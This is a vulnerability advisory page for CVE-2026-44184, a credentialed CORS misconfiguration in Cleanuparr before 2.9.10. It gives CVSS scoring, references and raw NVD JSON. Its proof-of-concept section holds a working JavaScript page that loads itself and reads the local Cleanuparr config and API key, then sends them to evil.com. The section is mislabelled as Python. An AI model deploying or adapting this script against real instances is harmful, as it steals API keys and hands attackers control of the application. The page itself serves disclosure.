CVE-2026-44184

Description

Cleanuparr is a tool for automating the cleanup of unwanted or blocked files in Sonarr, Radarr, and supported download clients like qBittorrent. Prior to 2.9.10, Cleanuparr's global CORS policy reflects every request Origin and combines it with AllowCredentials(). When DisableAuthForLocalAddresses is enabled, the API also authenticates requests purely by source IP via TrustedNetworkAuthenticationHandler. The combination lets any website that an admin (or any user on a trusted IP) visits read authenticated API responses cross-origin — including the admin's permanent API key. This vulnerability is fixed in 2.9.10.

CVSS Details

CVSS Score

8.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cleanuparr < 2.9.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC Concept: Steal API Key from Cleanuparr via CORS -->
<!-- Attacker hosts this on https://evil.com -->
<script>
// Target the local Cleanuparr instance
const targetUrl = 'http://localhost:3985/api/config';

function exploit() {
    fetch(targetUrl, {
        method: 'GET',
        credentials: 'include' // Important: Include cookies/auth if applicable
    })
    .then(response => response.json())
    .then(data => {
        // Exfiltrate the sensitive data (e.g., API Key)
        console.log('Leaked Data:', data);
        fetch('https://evil.com/log?key=' + encodeURIComponent(JSON.stringify(data)));
    })
    .catch(error => console.error('Error:', error));
}

// Trigger the attack automatically
exploit();
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44184
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44184
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44184/
[4] VulDB https://vuldb.com/cve/CVE-2026-44184
[5] https://github.com/Cleanuparr/Cleanuparr/security/advisories/GHSA-rwpc-36mg-fpvf
[6] https://github.com/Cleanuparr/Cleanuparr/security/advisories/GHSA-rwpc-36mg-fpvf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44184", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:29.583", "lastModified": "2026-05-12T19:16:33.937", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cleanuparr is a tool for automating the cleanup of unwanted or blocked files in Sonarr, Radarr, and supported download clients like qBittorrent. Prior to 2.9.10, Cleanuparr's global CORS policy reflects every request Origin and combines it with AllowCredentials(). When DisableAuthForLocalAddresses is enabled, the API also authenticates requests purely by source IP via TrustedNetworkAuthenticationHandler. The combination lets any website that an admin (or any user on a trusted IP) visits read authenticated API responses cross-origin — including the admin's permanent API key. This vulnerability is fixed in 2.9.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}, {"lang": "en", "value": "CWE-942"}]}], "references": [{"url": "https://github.com/Cleanuparr/Cleanuparr/security/advisories/GHSA-rwpc-36mg-fpvf", "source": "[email protected]"}, {"url": "https://github.com/Cleanuparr/Cleanuparr/security/advisories/GHSA-rwpc-36mg-fpvf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}